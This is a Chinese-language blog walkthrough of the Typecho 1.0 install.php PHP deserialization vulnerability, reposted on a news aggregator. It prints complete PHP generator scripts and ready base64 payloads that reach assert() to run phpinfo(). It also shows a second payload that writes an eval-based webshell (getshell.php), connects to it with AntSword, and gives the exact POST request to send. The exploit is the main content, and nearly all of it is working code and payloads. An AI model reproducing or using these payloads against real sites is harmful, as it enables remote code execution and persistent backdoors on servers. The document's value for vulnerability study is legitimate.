当前位置：首页 > news >正文

typecho反序列化

news 2025/7/5 12:55:26

typecho反序列化

环境的搭建

在这里插入图片描述

漏洞复现前提

<?php
class Typecho_Feed
{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct() {$this->_type = $this::RSS2;#$this->_type = $this::ATOM1;$this->_items[0] = array('category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}
class Typecho_Request
{private $_params = array();private $_filter = array();public function __construct() {$this->_params['screenName'] = 'phpinfo()'; //此处修改需要执行的代码$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix'  => 'typecho_'
);echo base64_encode(serialize($exp));
?>

运行代码会生成相应的base64的payload，以上代码会生成

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

1.执行phpinfo

设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

在这里插入图片描述

post data: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

2. getshell

<?php
class Typecho_Request
{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'file_put_contents(\'getshell.php\',\'<?php @eval($_POST[123]);?>\')';$this->_filter[0] = 'assert';}
}class Typecho_Feed
{private $_type;private $_items = array();public $dateFormat;public function __construct(){$this->_type = 'ATOM 1.0';$item['author'] = new Typecho_Request();$this->_items[0] = $item;}
}$x = new Typecho_Feed();
$a = array('adapter' => $x,'prefix' => 'typecho_'
);
echo "<pre>";
print_r($a);
echo "</pre>";
echo serialize($a)."<br>";
echo "__typecho_config=".base64_encode(serialize($a));
?>

file_put_contents(\'gethell.php\',\'<?php @eval($_POST[123]);?>\')
使用file_put_contents函数，将一句话木马写入文件，上传到当前目录下

在这里插入图片描述

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

执行：
设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

在这里插入图片描述

访问getshell.php页面,shell上传成功

在这里插入图片描述

蚁剑连接
http://192.168.149.211/typecho_1.0-14.10.10/getshell.php

在这里插入图片描述

具体的漏洞分析，可以鉴赏这篇[Typecho前台Getshell漏洞分析]（https://cloud.tencent.com/developer/article/1740471?from_column=20421&from=20421）

查看全文

http://www.lryc.cn/news/165161.html

php程序设计的基本原则

python execute() 使用%s 拼接sql 避免sql注入攻击好于.format

RPC项目解析（1）

点云从入门到精通技术详解100篇-基于 RGB 图像与点云融合的三维点云分割算法及成像系统

JDK8新特性

X86_64函数调用汇编程序分（2）

组件传值之ref（解决父传子动态绑定问题）

vscode-server

ubuntu 20.04安装开发环境总结_安装python

尚硅谷_宋红康_IntelliJ IDEA 常用快捷键一览表

Java设计模式之建造者模式详解（Builder Pattern）

TCP的滑动窗口与拥塞控制

MySQL更新语句执行过程

Matlab图像处理-彩色图像基础

MATLAB算法实战应用案例精讲-【数模应用】数据中台

el-form动态检验无法生效问题（已解决）

【python】代码学习过程问题总结

Qt应用开发(基础篇)——菜单 QMenu

MySQL-DDL语句

总结987

【服务器 | 测试】如何在centos 7上面安装jmeter

20.04部署cartographer

djangoMTV初探

Minecraft--基于云服务器搭建自己的服务器--简易搭建

【数据结构与算法】十大经典排序算法

Android 12.0 SystemUI下拉状态栏定制化之隐藏下拉通知栏布局功能实现(一)

665. 非递减数列-先改后验法

调教文心一言生成 AI绘画提示词（Midjourney）

半导体制造工艺（一）光刻

【海思SS626 | 开发环境】VMware17安装Ubuntu 18.04.6

typecho反序列化

环境的搭建

漏洞复现前提

1.执行phpinfo

2. getshell

相关文章：